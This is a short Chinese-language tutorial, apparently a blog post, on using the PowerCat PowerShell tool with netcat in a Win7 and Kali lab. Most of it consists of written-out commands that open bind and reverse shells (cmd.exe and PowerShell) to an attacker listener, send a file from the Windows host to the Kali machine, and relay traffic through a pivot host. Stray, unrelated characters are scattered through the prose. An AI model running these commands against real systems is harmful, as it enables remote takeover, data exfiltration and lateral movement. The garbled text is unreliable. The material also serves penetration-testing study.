項(xiàng)目地址:https://github.com/besimorhino/powercat.git
powercat與netcat的命令功能非常相似嗅回,可以相互連接。其中powercat可以返回powershell挚瘟,而netcat不支持。
導(dǎo)入powercat:
powershell #進(jìn)入powershell命令行 Set-ExecutionPolicy RemoteSigned #設(shè)置允許執(zhí)行本地powershell腳本 Import-Module ./powercat.ps1 powercat -h
nc正向連接PowerCat:
在win7上執(zhí)行命令饲梭,開(kāi)始監(jiān)聽(tīng):
powercat -l -p 4444 -e cmd.exe -v
在kali上執(zhí)行命令乘盖,連接win7端口獲得cmd命令行:nc 192.168.83.91 4444 -vv
nc反向連接PowerCat:
在kali上執(zhí)行命令監(jiān)聽(tīng):
nc -l -p 4444 -vv
在win7中執(zhí)行命令:powercat -c 192.168.83.100 -p 4444 -v -e cmd.exe
通過(guò)PowerCat反彈PowerShell:
在kali上執(zhí)行命令監(jiān)聽(tīng):nc -l -p 4444 -vv開(kāi)始監(jiān)聽(tīng)
在win7中執(zhí)行命令:powercat -c 192.168.83.100 -p 4444 -v -ep
通過(guò)PowerCat與nc傳輸文件:
在kali上執(zhí)行命令監(jiān)聽(tīng):nc -l -p 4444 > test.txt開(kāi)始監(jiān)聽(tīng),并把傳輸?shù)膬?nèi)容寫(xiě)入到test.txt中
在win7中執(zhí)行命令:powercat -c 192.168.83.100 -p 4444 -i C:\powercat-master\README.md -v
netcat沒(méi)有任何顯示憔涉,但已經(jīng)傳輸成功
使用PowerCat作為跳板:
靶機(jī)監(jiān)聽(tīng):powercat -l -v -p 6666 -e cmd.exe
跳板機(jī)監(jiān)聽(tīng):powercat -l -v -p 4444 -r tcp:192.168.83.91:6666
這樣订框,當(dāng)訪問(wèn)跳板機(jī)的4444端口時(shí),就會(huì)把流量轉(zhuǎn)發(fā)給靶機(jī)(192.168.83.91)的6666端口中了
